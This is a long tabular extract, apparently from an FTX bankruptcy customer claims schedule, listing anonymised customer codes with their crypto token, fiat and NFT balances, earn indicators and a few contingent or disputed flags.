| 07372972 | | USD[10.00] | | |
| 07372973 | | BRZ[1], CUSDT[1], DOGE[.7048758], USD[0.32], USDT[0.00000001] | | |
| 07372974 | | USD[0.00] | | |
| 07372975 | | BRZ[1], CUSDT[5], DOGE[.98345904], TRX[2], USD[0.00] | | |
| 07372977 | | BF_POINT[200], BTC[.0102486], CUSDT[4], DOGE[3], ETH[.94606864], ETHW[.94566256], LINK[19.58851767], LTC[2.83375546], TRX[14816.24663473], USD[0.00], USDT[363.61299123], YFI[.01596762] | Yes | |
| 07372978 | | DOGE[266.36328963], USD[2.25] | | |
| 07372979 | | USD[10.00] | | |
| 07372980 | | USD[10.00] | | |
| 07372982 | | BRZ[7.01104975], BTC[.00622982], CUSDT[14], DOGE[16.2161394], NFT (312821951072794815/SickintheGulliver Collection #54)[1], NFT (327594063230708929/MM Shark #8)[1], NFT (384368012087792056/New York State of Mind)[1], NFT (419501591916916133/SickintheGulliver Collection #31)[1], NFT (433246842297151631/Caelum Series #4)[1], NFT (573258300945361297/Ancient Civilization #53)[1], SHIB[31], TRX[9], USD[0.01], USDT[1.05290415] | Yes | |
| 07372984 | | USD[10.00] | | |
| 07372985 | | USD[10.00] | | |
| 07372986 | | DOGE[4], TRX[7658.38181476], USD[10.00] | | |
| 07372987 | | USD[10.00] | | |
| 07372988 | | BAT[26.54538811], USD[0.00] | Yes | |
| 07372989 | | CUSDT[1], TRX[2], USD[0.00] | | |
| 07372991 | | AUD[0.00], USD[0.00], USDT[0] | Yes | |
| 07372992 | | ETH[.07174842], ETHW[.07174842], USD[0.00], USDT[0.00000001] | | |
| 07372994 | | CUSDT[1], USD[0.00] | Yes | |
| 07372995 | | CUSDT[65.21979079], DOGE[0], SHIB[3], TRX[.00004188], USD[0.01] | Yes | |
| 07372996 | | USD[0.00] | | |
| 07372997 | | USD[10.00] | | |
| 07372998 | | CUSDT[1], DOGE[122.18056136], USD[0.00] | | |
| 07372999 | | BRZ[1], CUSDT[2], DOGE[1], USD[0.00] | | |
| 07373000 | | USD[10.00] | | |
| 07373001 | | USD[10.00] | | |
| 07373002 | | USD[10.00] | | |
| 07373003 | | DOGE[140.63249007], TRX[694.22017276], USD[0.00] | | |
| 07373004 | | USD[10.00] | | |
| 07373006 | | USD[10.00] | | |
| 07373008 | | CUSDT[6], GRT[0], LTC[0], TRX[1], USD[0.00] | Yes | |
| 07373009 | | DOGE[1.68287194], TRX[1], USD[0.00] | | |
| 07373010 | | USD[10.00] | | |
| 07373011 | | DOGE[.03192829], USD[0.00] | | |
| 07373012 | | USD[10.00] | | |
| 07373013 | | BRZ[3], CUSDT[8], DOGE[1], KSHIB[.14069278], TRX[1], USD[0.00] | Yes | |
| 07373014 | | CUSDT[1], USD[10.00], USDT[0] | | |
| 07373015 | | BTC[0], ETH[0], ETHW[0], NFT (459481465672752765/APEFUEL by Almond Breeze #170)[1], SOL[0.00080000], SUSHI[.1051], USD[1.62], USDT[1.464827] | | |
| 07373017 | | USD[0.00], USDT[0.00000001] | Yes | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07373018 | | BRZ[1], CUSDT[10390.14294695], DOGE[6600.48354325], SHIB[13869503.6467], TRX[2], USD[0.00] | | |
| 07373019 | | BRZ[1], USD[0.00], USDT[1.09839878] | Yes | |
| 07373020 | | USD[10.00] | | |
| 07373021 | | BTC[.11427064], ETH[0.00000002], SOL[245.46400000], USD[4.66], USDT[0] | | |
| 07373022 | | BRZ[1], CUSDT[5], GRT[80.13011261], TRX[6], USD[3.04], USDT[0] | Yes | |
| 07373023 | | GRT[55.7808579], SHIB[2], TRX[1], USD[0.00] | Yes | |
| 07373025 | | USD[10.00] | | |
| 07373026 | | USD[10.00] | | |
| 07373027 | | BTC[.00023933], USD[0.00] | | |
| 07373028 | | BTC[.00097458] | | |
| 07373029 | | USD[0.18] | | |
| 07373031 | | DOGE[.42013087], TRX[1], USD[1.90] | | |
| 07373032 | | USD[10.00] | | |
| 07373033 | | USD[10.00] | | |
| 07373034 | | DOGE[0], ETH[0], TRX[0], USD[0.04] | Yes | |
| 07373035 | | USD[10.00] | | |
| 07373036 | | USD[10.00] | | |
| 07373037 | | USD[10.00] | | |
| 07373039 | | BAT[1.01655549], BRZ[0.00157645], BTC[0], CUSDT[5], DOGE[0], ETH[0], SOL[0], TRX[0], USD[0.00] | Yes | |
| 07373040 | | USD[10.00] | | |
| 07373041 | | BAT[.45923031], BCH[.00041838], BRZ[.59197447], CUSDT[7.0849981], DAI[.91185438], DOGE[.64445387], ETH[.00000021], ETHW[.00000021], GRT[.14221672], LTC[.00014689], MATIC[.1778409], SOL[.00003635], SUSHI[.05795801], TRX[.15426887], USD[-0.25], USDT[0.17193923] | Yes | |
| 07373043 | | USD[0.00] | | |
| 07373046 | | DOGE[137.93714176], LTC[.05059961], USD[0.00] | | |
| 07373047 | | USD[10.00] | | |
| 07373049 | | USD[10.00] | | |
| 07373050 | | BAT[1], DAI[9.9470557], GRT[1], USD[0.00] | | |
| 07373052 | | DOGE[3883.12593215], USD[0.76] | | |
| 07373053 | | BRZ[2], CUSDT[6], ETH[.00000835], ETHW[.9139708], GRT[2175.16231196], LINK[20.8548067], LTC[2.12867764], SHIB[.00000009], TRX[5], USD[1622.97] | Yes | |
| 07373054 | | BRZ[1], DOGE[320.76826426], USD[30.48] | | |
| 07373056 | | USD[10.00] | | |
| 07373057 | | BAT[1], BRZ[0.00000001], CUSDT[3], DOGE[2], SOL[0.00001603], SUSHI[0.00727762], USD[0.00], USDT[0] | | |
| 07373058 | | DOGE[1], SUSHI[.80069922], USD[0.00] | | |
| 07373060 | | BTC[0], GRT[.0000023], SHIB[1], USD[0.00] | Yes | |
| 07373061 | | USD[10.00] | | |
| 07373062 | | USD[10.00] | | |
| 07373063 | | USD[0.00] | | |
| 07373064 | | CUSDT[19.21634676], DOGE[1], USD[0.00] | | |
| 07373065 | | TRX[1], USD[0.00] | | |
| 07373067 | | DOGE[1], USD[0.00] | | |
| 07373069 | | BAT[12.23908942], BRZ[68.92844773], BTC[.00000001], CUSDT[570.84391193], DAI[11.91545152], DOGE[109.19273505], ETH[.00000011], ETHW[.00000011], GRT[5.91543941], SHIB[2], SOL[.91114602], SUSHI[1.09156143], TRX[2.00003021], USD[0.36], YFI[.00067105] | Yes | |
| 07373070 | | USD[10.00] | | |
| 07373071 | | CUSDT[10], DOGE[5.2527628], SUSHI[.00015564], TRX[1], USD[0.02] | Yes | |
| 07373072 | | USD[10.00] | | |
| 07373073 | | TRX[101.72461884], USD[5.00] | | |
| 07373074 | | USD[10.00] | | |
| 07373076 | | BRZ[1], CUSDT[3], DOGE[1], TRX[69.43559625], USD[0.00] | | |
| 07373077 | | TRX[1], USD[3.12] | | |
| 07373078 | | CUSDT[1], DOGE[0.37679014], GRT[0], USD[0.00] | | |
| 07373079 | | USD[10.00] | | |
| 07373080 | | BRZ[2], BTC[.01106562], CUSDT[10], DOGE[2798.20966055], ETH[1.08180372], ETHW[1.08133936], SHIB[4], SOL[2.34578364], USD[29.31] | Yes | |
| 07373083 | | BTC[0.00001249], CUSDT[1], DOGE[0], ETH[0.00139442], ETHW[0.00139442], USD[0.00] | | |
| 07373085 | | USD[10.00] | | |
| 07373086 | | BTC[.00021522], CUSDT[1], DOGE[2716.33042441], TRX[1], USD[50.00] | | |
| 07373087 | | CUSDT[3], TRX[1], USD[0.00] | | |
| 07373088 | | USD[10.00] | | |
| 07373089 | | USD[10.00] | | |
| 07373090 | | BTC[.00368294], ETH[1.088628], ETHW[1.088628], SOL[0.10873505], USD[1.41] | | |
| 07373091 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07373092 | | CUSDT[1], DOGE[5.11845859], GRT[.0000267], LTC[.00004231], TRX[2.00000492], USD[0.01], USDT[1.10349625] | Yes | |
| 07373095 | | NFT (304471124754630912/FTX Crypto Cup 2022 Key #510)[1], NFT (337801774841663969/The Hill by FTX #62)[1], NFT (488509610851229885/APEFUEL by Almond Breeze #400)[1], SOL[.06], USD[0.50], USDT[.0095272] | | |
| 07373096 | | BAT[1], BCH[2.34413747], BTC[.00480748], CUSDT[20], DOGE[320.46005267], ETH[.12653607], ETHW[.12540968], LINK[1.58743787], LTC[1.27569496], SHIB[4], TRX[5895.09902746], USD[0.00] | Yes | |
| 07373097 | | USD[0.00] | | |
| 07373098 | | BRZ[1], BTC[.00154119], CUSDT[10305.15191234], DOGE[148.40750529], TRX[1], USD[0.00] | Yes | |
| 07373099 | | SOL[24.05109876], TRX[2], USD[0.00] | Yes | |
| 07373101 | | USD[10.00] | | |
| 07373103 | | USD[10.00] | | |
| 07373104 | | DOGE[.24522489], USD[6.11], USDT[0.00000001] | | |
| 07373105 | Contingent, Disputed | CUSDT[2], DOGE[.22638477], TRX[2], USD[0.00] | | |
| 07373106 | | DOGE[27.20258885], USD[0.00] | | |
| 07373107 | | USD[10.00] | | |
| 07373108 | | USD[10.00] | | |
| 07373109 | | USD[10.00] | | |
| 07373110 | | BRZ[1], CUSDT[2], DOGE[1.03298615], TRX[255.87382787], USD[361.88] | Yes | |
| 07373111 | | BRZ[1], SHIB[1], USD[11.66], USDT[0] | Yes | |
| 07373112 | | USD[10.00] | | |
| 07373113 | | DOGE[141.97432621], USD[0.00] | | |
| 07373114 | | TRX[360.84602578], USD[0.00] | | |
| 07373115 | | USD[10.00] | | |
| 07373116 | | USD[10.00] | | |
| 07373117 | | DOGE[1334.77176887], USD[10.00] | | |
| 07373118 | | BTC[.01549804], DOGE[1561.06519883], ETH[.36503817], ETHW[.02481227], SHIB[137789143.80258167], SOL[44.91670963], USD[0.00], USDT[0] | Yes | |
| 07373119 | | USD[10.00] | | |
| 07373120 | | USD[10.00] | | |
| 07373122 | | USD[0.00], USDT[0] | Yes | |
| 07373123 | | DOGE[32.50269869], USD[0.00] | | |
| 07373124 | | BCH[0], CUSDT[2], DOGE[2], TRX[4], USD[0.01], USDT[2] | | |
| 07373125 | | CUSDT[1841.46586951], USD[0.00] | Yes | |
| 07373127 | | GRT[4.76577585], USD[0.00] | Yes | |
| 07373128 | | BAT[2.09800555], BRZ[1], DOGE[2072.43567219], LINK[39.62445907], SOL[46.55970042], USD[0.00] | Yes | |
| 07373129 | | DOGE[123.97495953], USD[0.00] | | |
| 07373130 | | USD[10.00] | | |
| 07373134 | | GRT[6080.57330413], USD[32.33], USDT[0] | | |
| 07373136 | | DOGE[32.18405157], USD[0.00] | | |
| 07373137 | | USD[10.00] | | |
| 07373139 | | UNI[.0275], USD[0.01], YFI[.000992] | | |
| 07373142 | | USD[10.00] | | |
| 07373143 | | GRT[4.54309919], USD[0.00] | | |
| 07373144 | | DOGE[4], USD[0.00] | | |
| 07373146 | | SUSHI[0], USDT[1.89260366] | | |
| 07373147 | | USD[10.00] | | |
| 07373148 | | USD[10.00] | | |
| 07373149 | | USD[10.00] | | |
| 07373150 | | CUSDT[2], DOGE[28.99609165], USD[0.00] | | |
| 07373151 | | BRZ[2], BTC[.00206868], CUSDT[7], DAI[99.2027905], DOGE[525.68778085], ETH[.66011457], ETHW[.66011457], SOL[.21850396], TRX[985.08978319], USD[0.15] | | |
| 07373152 | | SHIB[3226.20319302], USD[0.00] | | |
| 07373153 | | TRX[57.79037017], USD[0.00] | | |
| 07373155 | | CUSDT[1], DOGE[779.06618011], USD[110.00] | | |
| 07373156 | | BTC[.00022121], USD[0.00] | Yes | |
| 07373159 | | SHIB[219.99854142], USD[3.21] | Yes | |
| 07373162 | | CUSDT[5], DOGE[0], GRT[0], TRX[145.76541503], USD[0.00] | | |
| 07373163 | | BRZ[1], DOGE[1135.00139477], GRT[1], NFT (573866278475506453/Coachella x FTX Weekend 1 #29710)[1], TRX[4], USD[0.00] | | |
| 07373165 | | BTC[0], USD[0.00] | | |
| 07373166 | | USD[10.00] | | |
| 07373167 | | BTC[.00004853], CUSDT[4], DOGE[.00003604], GRT[3], TRX[4], USD[0.00] | | |
| 07373168 | | LINK[.39243311], USD[0.00] | | |
| 07373169 | | TRX[.02932238], USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07373170 | | CUSDT[2], DOGE[.68859596], USD[0.00] | | |
| 07373171 | | BTC[0], CUSDT[1], DOGE[0], TRX[0], USD[0.01], USDT[0] | | |
| 07373172 | | USD[0.00] | | |
| 07373173 | | BTC[0], DOGE[1], USD[0.00] | | |
| 07373174 | | BAT[1], BRZ[1], CUSDT[9], DOGE[343381.45431238], GRT[1], SOL[1], TRX[8], USD[0.00] | | |
| 07373175 | | GBP[4.98], USD[0.00] | | |
| 07373177 | | TRX[136.5422771], USD[0.00] | | |
| 07373178 | | BAT[0], BTC[0], DAI[0], ETH[0], GRT[0], LINK[0], LTC[0], PAXG[0], SOL[0], SUSHI[0], TRX[0], UNI[0], USD[0.00], YFI[0] | | |
| 07373180 | | USD[0.00] | | |
| 07373181 | | CUSDT[2], SUSHI[.61325492], USD[0.00] | | |
| 07373182 | | USD[0.00] | | |
| 07373183 | | BRZ[4], CUSDT[12], DOGE[1], GRT[.72913478], TRX[2.38781605], USD[0.00], USDT[1] | | |
| 07373186 | | USD[0.00] | | |
| 07373187 | | DOGE[188.59661861], USD[0.00] | | |
| 07373190 | | USD[0.00] | | |
| 07373191 | | USD[0.00] | | |
| 07373192 | | BTC[.00033502], DOGE[.928], USD[1.42] | | |
| 07373193 | | CUSDT[1], DOGE[140.94226102], USD[0.00] | | |
| 07373194 | | USD[0.00] | | |
| 07373195 | | USD[0.00] | | |
| 07373196 | | ETH[.00031748], ETHW[.00031748], USD[0.00] | Yes | |
| 07373197 | | USD[0.00] | | |
| 07373198 | | BRZ[2], BTC[.10980859], CUSDT[10], DOGE[4], ETH[.44737808], ETHW[.44719023], SHIB[2], SOL[30.65509804], TRX[8], USD[0.00] | Yes | |
| 07373199 | | USD[0.00] | | |
| 07373200 | | CUSDT[946.34054705], DOGE[1129.58840403], TRX[2033.27826457], USD[10.00] | | |
| 07373201 | | DOGE[1], SOL[1.29609558], USD[0.00] | Yes | |
| 07373203 | | USD[0.00] | | |
| 07373205 | | CUSDT[1], DOGE[0], USD[0.00] | | |
| 07373207 | | DOGE[123.80282002], TRX[2], USD[0.00] | Yes | |
| 07373208 | | USD[0.00] | | |
| 07373209 | | DOGE[0], GRT[0], SOL[0], SUSHI[0], USD[0.00], USDT[0.14787265] | | |
| 07373210 | | USD[0.00] | | |
| 07373211 | | ETH[0], ETHW[0], USD[0.00] | | |
| 07373213 | | USD[0.00] | | |
| 07373215 | | CUSDT[6], TRX[1], USD[0.00] | | |
| 07373216 | | USD[0.00] | | |
| 07373217 | | BRZ[2], CUSDT[5], ETH[.00000001], ETHW[0], NFT (53900194020808203/Barcelona Ticket Stub #1782)[1], NFT (560123270980531136/FTX - Off The Grid Miami #424)[1], SHIB[3], TRX[3], USD[0.00], USDT[0] | Yes | |
| 07373218 | | CUSDT[1], DOGE[255.99877505], ETH[.16330986], ETHW[.16286286], TRX[1], USD[0.00] | Yes | |
| 07373219 | | USD[0.00] | | |
| 07373220 | | BAT[0], DOGE[1], USD[0.00] | | |
| 07373222 | | USD[0.00] | | |
| 07373223 | | BTC[.00010596], CAD[0.00], ETH[.00274818], ETHW[.00274818], USD[0.00] | | |
| 07373224 | | USD[0.00] | | |
| 07373225 | | USD[0.00] | | |
| 07373226 | | BTC[.0002213], DOGE[1], ETH[.01462083], ETHW[.01462083], USD[0.00] | | |
| 07373227 | | USD[0.00] | | |
| 07373228 | | USD[0.00] | | |
| 07373229 | | USD[0.00] | | |
| 07373230 | | USD[0.00] | | |
| 07373231 | | USD[0.00] | | |
| 07373233 | | USD[0.00] | | |
| 07373234 | | USD[0.00] | | |
| 07373236 | | USD[0.00] | | |
| 07373237 | | USD[0.00] | | |
| 07373238 | | BRZ[1], BTC[0], DOGE[0], ETH[0], LTC[0], SHIB[3044653.22257930], TRX[1], USD[0.00], USDT[0] | Yes | |
| 07373239 | | DOGE[144.64072834], USD[0.00] | | |
| 07373240 | | USD[0.00] | | |
| 07373241 | | CUSDT[1], DOGE[945.18429215], USD[44.28] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07373242 | | BRZ[1], DOGE[2381.42001293], TRX[2], USD[0.00] | | |
| 07373243 | | USD[10.00] | | |
| 07373244 | | USD[10.00] | | |
| 07373245 | | NFT (505813259447605306/Coachella x FTX Weekend 2 #27421)[1], SOL[.21977999], USD[0.00] | | |
| 07373246 | | USD[10.00] | | |
| 07373247 | | BTC[0], CUSDT[2], DOGE[0], USD[0.01] | | |
| 07373248 | | USD[120.88] | | |
| 07373249 | | DOGE[.50468521], USD[0.00] | | |
| 07373251 | | CUSDT[1], DOGE[2705.62766721], USD[0.00] | | |
| 07373255 | | USD[10.00] | | |
| 07373256 | | BRZ[1], DOGE[1], TRX[4], USD[0.01] | | |
| 07373257 | | CUSDT[4], USD[17.71], USDT[0] | Yes | |
| 07373258 | | CUSDT[5], USD[21.00] | Yes | |
| 07373259 | | CUSDT[1], DOGE[.00056865], TRX[1], USD[0.01] | | |
| 07373260 | | ETHW[109.39012155], TRX[1], USD[0.00] | Yes | |
| 07373261 | | USD[0.00] | | |
| 07373262 | | BAT[1], BRZ[3], CUSDT[9], GRT[0], TRX[2], USD[0.00], USDT[0.00000001] | | |
| 07373263 | | USD[10.00] | | |
| 07373264 | | USD[0.00] | | |
| 07373265 | | BTC[.00018992], USD[0.00] | | |
| 07373266 | | BAT[1.0165555], BRZ[2], BTC[.00698876], CUSDT[3], DOGE[815.13029937], TRX[5], USD[0.03] | Yes | |
| 07373267 | | BTC[.00020745], USD[0.00] | | |
| 07373268 | | ETHW[.00012655], USD[0.00] | Yes | |
| 07373270 | | CUSDT[12], TRX[5], USD[0.00] | | |
| 07373271 | | DOGE[1304.16438284], USD[10.00] | | |
| 07373272 | | DOGE[1], SHIB[1], USD[25.08] | | |
| 07373273 | | USD[0.00] | | |
| 07373274 | | USD[10.00] | | |
| 07373275 | | BAT[0], TRX[3], USD[0.00], USDT[1] | | |
| 07373276 | | TRX[1], USD[0.00] | | |
| 07373277 | | BRZ[1], DOGE[0], LTC[0], USD[0.00] | | |
| 07373278 | | CUSDT[3], USD[0.00], USDT[0] | Yes | |
| 07373279 | | USD[10.00] | | |
| 07373280 | | BTC[0], DOGE[0], USD[0.00] | | |
| 07373282 | | USD[0.00], USDT[1.10995459] | Yes | |
| 07373284 | | DOGE[407.65695345], TRX[1], USD[0.00] | | |
| 07373285 | | USD[10.00] | | |
| 07373286 | | DOGE[1.0000308], USD[10.43] | | |
| 07373288 | | USD[10.00] | | |
| 07373290 | | CUSDT[2], DOGE[2], NFT (483555810103583420/FTX - Off The Grid Miami #2839)[1], TRX[1], USD[0.00] | | |
| 07373291 | | TRX[1], USD[0.00] | | |
| 07373292 | | USD[170.96], USDT[0.00000001] | Yes | |
| 07373293 | | USD[0.00], USDT[0] | | |
| 07373294 | | BRZ[1], CUSDT[11], TRX[4], USD[0.00] | | |
| 07373295 | | SOL[23.824], USD[307.67] | | |
| 07373296 | | USD[10.00] | | |
| 07373297 | | BAT[0], CUSDT[3], GRT[0], TRX[1], USD[0.01], USDT[0.00000001] | | |
| 07373298 | | SOL[.08720299], USD[0.00] | Yes | |
| 07373300 | | USD[0.00] | | |
| 07373301 | | USD[0.00] | | |
| 07373304 | | CUSDT[1], DOGE[1], USD[0.01] | Yes | |
| 07373305 | | USD[10.00] | | |
| 07373308 | | USD[10.00] | | |
| 07373309 | | MATIC[2.52708181], USD[0.00] | Yes | |
| 07373310 | | LINK[.37305397], USD[0.00] | | |
| 07373311 | | USD[0.00], USDT[0] | | |
| 07373312 | | ALGO[.00000001], SHIB[2], USD[0.01] | Yes | |
| 07373313 | | SUSHI[.75285034], USD[0.00] | Yes | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07373314 | | BRZ[0], DOGE[1], USD[0.01] | | |
| 07373315 | | DOGE[20.67851586], USD[0.00] | | |
| 07373316 | | USD[10.00] | | |
| 07373317 | | DOGE[291.22778382], USD[10.00] | | |
| 07373318 | | TRX[1], USD[0.00] | | |
| 07373320 | | USD[10.00] | | |
| 07373321 | | USD[10.00] | | |
| 07373322 | | BAT[24.92461659], BRZ[0], BTC[0.00916069], CUSDT[4], DOGE[1], LTC[.06597228], MKR[.09568809], TRX[1223.72679346], UNI[.57029732], USD[0.00], USDT[10.8567406] | Yes | |
| 07373323 | | USD[0.00] | Yes | |
| 07373324 | | USD[10.00] | | |
| 07373325 | | USD[10.00] | | |
| 07373326 | | BCH[0], DOGE[352.49184986], SHIB[1296434.8042882], SOL[1.00096601], TRX[1119.91667382], USD[0.02], USDT[0] | | |
| 07373327 | | USD[10.00] | | |
| 07373328 | | GRT[1], TRX[122.72819625], USD[338.97] | Yes | |
| 07373329 | | USD[10.00] | | |
| 07373330 | | BAT[1], BTC[.00020705], CUSDT[14], DOGE[6844.57131511], TRX[1], USD[0.00], USDT[1] | | |
| 07373331 | | USD[10.00] | | |
| 07373332 | | USD[10.00] | | |
| 07373333 | | USD[10.00] | | |
| 07373336 | | DOGE[172.4726717], USD[0.00] | | |
| 07373337 | | USD[10.00] | | |
| 07373338 | | BCH[0.00082569], BTC[0.00003501], DOGE[0.74457946], ETH[0.00097417], ETHW[3.63890632], LINK[.298], LTC[.5317], MATIC[0], SOL[0.07222928], SUSHI[0.42990376], TRX[1.835], UNI[0], USD[0.72], USDT[0.00906068] | | |
| 07373339 | | CUSDT[3], DOGE[527.85559698], ETH[.01827411], ETHW[.01827411], USD[0.01] | | |
| 07373340 | Contingent, Disputed | TRX[1], USD[0.00] | | |
| 07373341 | | DOGE[134.29914113], USD[0.00] | | |
| 07373342 | | USD[10.00] | | |
| 07373343 | | USD[10.00] | | |
| 07373345 | | LTC[.04317023], USD[0.00] | | |
| 07373346 | | DOGE[2], ETH[0], USD[0.01] | Yes | |
| 07373347 | | BCH[.03162651], CUSDT[5], DOGE[715.73843034], SHIB[1], USD[50.00] | | |
| 07373348 | | CUSDT[1], USD[0.00] | | |
| 07373349 | | USD[10.00] | | |
| 07373350 | | USD[10.00] | | |
| 07373352 | | BRZ[3], BTC[0.00000001], DOGE[1289.12611307], ETHW[.00000084], LINK[0], NFT (350944747755120725/Alien #2 of 3)[1], NFT (364578249592873442/USA)[1], NFT (387129859209376803/Australia Ticket Stub #1170)[1], NFT (447530712257479028/BCS)[1], NFT (507526918424746628/Open Water #3)[1], NFT (525211105617736558/Alien #1 of 3)[1], NFT (527587335203161793/Bob #1 of 3)[1], NFT (536207549546367347/Open Water #2)[1], SHIB[29], TRX[7], USD[0.00], USDT[0.00001851] | Yes | |
| 07373353 | | USD[10.00] | | |
| 07373355 | | USD[10.00] | | |
| 07373356 | | USD[10.00] | | |
| 07373357 | | BRZ[2], CUSDT[9], DOGE[2], SOL[.92706034], TRX[4], USD[0.01], USDT[4.96955343] | | |
| 07373358 | | BRZ[6], BTC[0], CUSDT[26], DOGE[13.45631998], ETH[3.88537709], ETHW[3.88537709], GRT[40.1626015], MATIC[35.26445687], SHIB[10], SOL[4.34501067], TRX[8], USD[0.00] | | |
| 07373359 | | DOGE[.86396594], TRX[.00003487], USD[0.00] | | |
| 07373361 | | SOL[0], SUSHI[0] | | |
| 07373362 | | BRZ[1], DOGE[1], TRX[1], USD[0.00] | Yes | |
| 07373363 | | USD[10.00] | | |
| 07373366 | | BTC[.00021243], USD[0.00] | | |
| 07373367 | | LINK[.32675632], USD[0.00] | | |
| 07373368 | | CUSDT[4], DOGE[141.69763126], GRT[14.52615608], USD[1.43] | | |
| 07373369 | | USD[0.00] | | |
| 07373370 | | BTC[.00020208], USD[0.00] | | |
| 07373372 | | BTC[0], ETH[.00087341], USD[0.00] | | |
| 07373373 | | DOGE[136.40022882], USD[0.00] | | |
| 07373374 | | ETH[0], USD[0.00] | Yes | |
| 07373377 | | USD[10.00] | | |
| 07373378 | | BTC[.00018047], USD[0.00] | | |
| 07373379 | | BRZ[1], CUSDT[17], DOGE[2], TRX[4], USD[0.05] | | |
| 07373380 | | BRZ[4], BTC[.00000008], CUSDT[7], DOGE[799.60010892], ETH[0.00000525], ETHW[0.0000525], GRT[.0006536], LTC[.00003325], SOL[.00449583], TRX[1.00050585], UNI[.00004058], USD[0.00] | | |
| 07373381 | | TRX[.95005614], USD[0.00], USDT[0] | | |
| 07373382 | | DOGE[14.59733016], USD[5.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07373383 | | BAT[2.13152217], BRZ[1], CUSDT[6], DOGE[.00001077], ETH[.00002273], ETHW[.00002273], LINK[.00007716], TRX[.15047814], USD[5.39] | Yes | |
| 07373384 | | USD[0.00] | | |
| 07373386 | | USD[55.45] | | |
| 07373387 | | USD[10.00] | | |
| 07373388 | | DOGE[1.83365605], USD[0.00] | | |
| 07373389 | | BAT[0], BRZ[1], CUSDT[1], DOGE[0], ETH[0.04427350], ETHW[0.04372590], GRT[1.00367791], PAXG[0.06058923], TRX[0], USD[0.00] | Yes | |
| 07373390 | | USD[10.00] | | |
| 07373391 | | BTC[.0712], ETH[.200098], ETHW[.200098], SOL[4.12027001], TRX[10753.02515], USD[86.85] | | |
| 07373392 | | USD[10.00] | | |
| 07373393 | | TRX[0], USD[0.00] | | |
| 07373395 | | USD[10.00] | | |
| 07373396 | | USD[1.62] | | |
| 07373399 | | BTC[.00002125], USD[0.00], USDT[0] | | |
| 07373401 | | GRT[155.541], LINK[15.9904], SUSHI[6.452], UNI[.0956], USD[0.69], USDT[.8674242] | | |
| 07373402 | | BTC[.00016304], CUSDT[1], USD[0.00] | | |
| 07373403 | | USD[0.00], USDT[10.90194072] | Yes | |
| 07373404 | | USD[10.00] | | |
| 07373405 | | CUSDT[1], DOGE[31543.64874021], USD[0.00], USDT[0] | | |
| 07373407 | | USD[10.00] | | |
| 07373408 | | BAT[0.00000001], BCH[0], BRZ[0], BTC[0], DOGE[0], ETH[0.00000001], ETHW[0], GRT[0], LTC[0], SHIB[1], TRX[0], USD[0.01], USDT[0] | Yes | |
| 07373409 | | CUSDT[1], USD[0.01] | Yes | |
| 07373410 | | DOGE[1], ETH[.00566154], ETHW[.00566154], USD[0.00] | | |
| 07373411 | | BRZ[1], CUSDT[1.00741025], DOGE[1.22061412], TRX[.32806204], USD[0.01] | | |
| 07373412 | | USD[10.00] | | |
| 07373413 | | BF_POINT[100], BTC[.02677161], CUSDT[1], DOGE[0], NFT (499429769262043266/Saudi Arabia Ticket Stub #122)[1], TRX[1], USD[0.00] | Yes | |
| 07373415 | | DOGE[122.88698894], USD[0.00] | | |
| 07373416 | | USD[10.00] | | |
| 07373417 | | USD[0.00] | Yes | |
| 07373418 | | BRZ[3], CUSDT[10], DOGE[19.7589029], TRX[8.00087675], USD[0.01], USDT[0] | Yes | |
| 07373419 | | CUSDT[2], DOGE[3], TRX[1], USD[0.00] | | |
| 07373420 | | USD[0.00] | | |
| 07373421 | | BTC[0], NFT (365726844023429343/FTX - Off The Grid Miami #5312)[1], NFT (389344937315171301/Elbit Ape #7242)[1], NFT (565859378837140834/Miami Ticket Stub #138)[1], SOL[0.00939419], SUSHI[.00000001], USD[1.18], USDT[0] | | |
| 07373422 | | CUSDT[1], DOGE[1682.5130555], USD[0.00] | Yes | |
| 07373423 | | BTC[0], LTC[0], SUSHI[0], TRX[0], USD[0.00] | | |
| 07373424 | | BRZ[1], DOGE[2661.97080042], ETH[.01003977], TRX[1], USD[0.00] | | |
| 07373427 | | DOGE[3], GRT[0], TRX[0.13734776], USD[0.00] | Yes | |
| 07373430 | | BAT[4], BRZ[2], CUSDT[9], DAI[0], DOGE[1], ETH[0], GRT[1], LTC[0], TRX[2], UNI[0], USD[0.00], USDT[1] | | |
| 07373431 | | BRZ[1], CUSDT[2], DOGE[6.07031416], LINK[2.82737409], SOL[.00000291], TRX[1], USD[0.00] | Yes | |
| 07373432 | | BAT[0], BCH[0], BRZ[2], BTC[0], CUSDT[22], DOGE[0.00158127], ETH[0], MATIC[0], PAXG[0], SOL[0], TRX[0], USD[41.27] | Yes | |
| 07373433 | | USD[10.00] | | |
| 07373434 | | USD[10.00] | | |
| 07373435 | | USD[10.00] | | |
| 07373436 | | BAT[3.1552572], BRZ[3], DOGE[6.03440214], GRT[2.05725453], LINK[1.09238982], NEAR[622.36582373], SOL[2.21473815], TRX[6], UNI[1.06505119], USD[0.01], USDT[2.16449623] | Yes | |
| 07373437 | | BAT[1], CUSDT[3], TRX[105.45461468], USD[0.00] | | |
| 07373438 | | DOGE[0], ETH[0], USD[0.00] | | |
| 07373439 | | USD[10.00] | | |
| 07373441 | | DOGE[180.89384744], USD[0.00] | | |
| 07373444 | | CUSDT[3], SOL[0], TRX[3], USD[0.00], USDT[0] | | |
| 07373446 | | BRZ[1], CUSDT[1], TRX[1], USD[0.00] | | |
| 07373449 | | ETH[.00000001], USD[0.16] | | |
| 07373450 | | DOGE[1], USD[10.00], USDT[24.84032342] | | |
